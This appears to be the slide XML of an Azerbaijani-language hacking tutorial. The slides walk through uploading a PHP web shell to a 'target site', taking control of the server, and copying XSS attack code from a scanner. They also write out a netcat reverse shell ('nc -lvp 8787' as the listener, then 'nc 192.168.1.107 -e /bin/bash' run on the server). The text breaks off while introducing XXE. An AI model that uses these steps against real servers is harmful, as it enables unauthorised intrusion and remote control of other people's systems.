                  <a:schemeClr val="accent6">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>shell php </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>atıb işləyib işləməyəcəyinə baxırıq.</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49" name="Şəkil 4" descr="Şəkil ehtiva edir mətn, ani görüntü, monitor, qara  Avtomatik yaradılan təsvir"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect r="8822"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="-1"/>
            <a:ext cx="5821128" cy="3697203"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2097250" name="Şəkil 6" descr="Şəkil ehtiva edir mətn  Avtomatik yaradılan təsvir"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5821128" y="0"/>
            <a:ext cx="6405908" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048804" name="Mətn Qutusu 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="87549" y="3736112"/>
            <a:ext cx="5505855" cy="1882140"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>İnternetdə </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="4000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> dilində yazılan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="4000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>istədəyimiz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="4000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-i yükləyirik.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51" name="Şəkil 4" descr="Şəkil ehtiva edir mətn, monitor, ani görüntü, ekran  Avtomatik yaradılan təsvir"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9653433" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048805" name="Mətn Qutusu 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9727660" y="204281"/>
            <a:ext cx="2383276" cy="1767841"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Yüklədiyimiz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ni</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> hədəf sayta göndəririk.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048806" name="Mətn Qutusu 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9727659" y="2228671"/>
            <a:ext cx="2383275" cy="1869440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Fayl uğurlu şəkildə yüklənir </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>here</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>yazısına basıb faylımızı açırıq.</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52" name="Şəkil 4" descr="Şəkil ehtiva edir mətn, ani görüntü, monitor, qara  Avtomatik yaradılan təsvir"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9308438" cy="6857999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048807" name="Mətn Qutusu 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9308438" y="214009"/>
            <a:ext cx="2773315" cy="4917440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="008000"/>
                </a:highlight>
              </a:rPr>
              <a:t>uğurlu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> şəkildə açılır bunun sayəsində server demək </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>olarki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> bizim nəzarətimizə keçir burdan istədiyimiz işi görə bilərik.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28"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29" name="Rectangle 11"/>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60" name="Şəkil 4" descr="Şəkil ehtiva edir mətn  Avtomatik yaradılan təsvir"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="97429" y="176557"/>
            <a:ext cx="9076174" cy="6421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30"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8631" name="Mətn Qutusu 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9194181" y="456025"/>
            <a:ext cx="2997818" cy="3600986"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cross Site Scripting</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0"/>
              <a:t>Bölməsində həmən</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0"/>
              <a:t>shifədən yüksək riskli açıq tapdığını və həmən açığın necə istismar ediləcəyini göstərir</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048632" name="Mətn Qutusu 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9271030" y="4421171"/>
            <a:ext cx="2644449" cy="1513840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0" err="1"/>
              <a:t>Attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0"/>
              <a:t> bölməsində göstərilən kodu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0" err="1"/>
              <a:t>kopyalayırıq</a:t>
            </a:r>
            <a:endParaRPr lang="az-Latn-AZ" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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53" name="Şəkil 4" descr="Şəkil ehtiva edir mətn  Avtomatik yaradılan təsvir"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect t="10858"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="6303523" cy="2955064"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2097254" name="Şəkil 6" descr="Şəkil ehtiva edir mətn, ani görüntü, qara  Avtomatik yaradılan təsvir"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2773326"/>
            <a:ext cx="9099068" cy="4084674"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048808" name="Mətn Qutusu 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6303523" y="133350"/>
            <a:ext cx="5781675" cy="1958341"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NetCat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>toolu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vasitəsiylə</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> serverlə terminalımız arasında əlaqə qura bilərik bunun üçün</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lvp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 8787</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  əmri ilə  8787 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>protunu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> dinləməyə alırıq.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sonra serverdə açdığımız </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>shelldə</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> öz İP mizin 8787 portuna bağlayırıq</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 192.168.1.107 –e /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bash</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>yazıb </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Execute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> yazısına basırıq</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048809" name="Mətn Qutusu 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9194360" y="2773326"/>
            <a:ext cx="2721415" cy="2606041"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Bağlantı gəlir və terminaldan istədiyimiz </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> əmrini serverdə işlədə bilərik.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048810" name="Düzbucaqlı 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="4686300"/>
            <a:ext cx="3505242" cy="28575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48811" name="Başlıq 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="196976" y="187452"/>
            <a:ext cx="6546724" cy="1784223"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XML , XXE</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  təhlükəsizlik açığı</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048812" name="Mətn Qutusu 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="196976" y="2237362"/>
            <a:ext cx="11641586" cy="4434840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Xml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Extensible</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Markup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Language</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>) genişlənən işarələmə dili olaraq </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>adlandırılan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> həm maşınlar, həm də insanlar tərəfindən oxuna bilən sənədləri kodlamaq üçün Geniş </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Veb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Konsorsiumu (W3C) tərəfindən yaradılan bir işarələmə dili olaraq bilinir.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="az-Latn-AZ" sz="3200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XML  de olan təhlükəsizlik açığına XXE yəni XML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>external</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
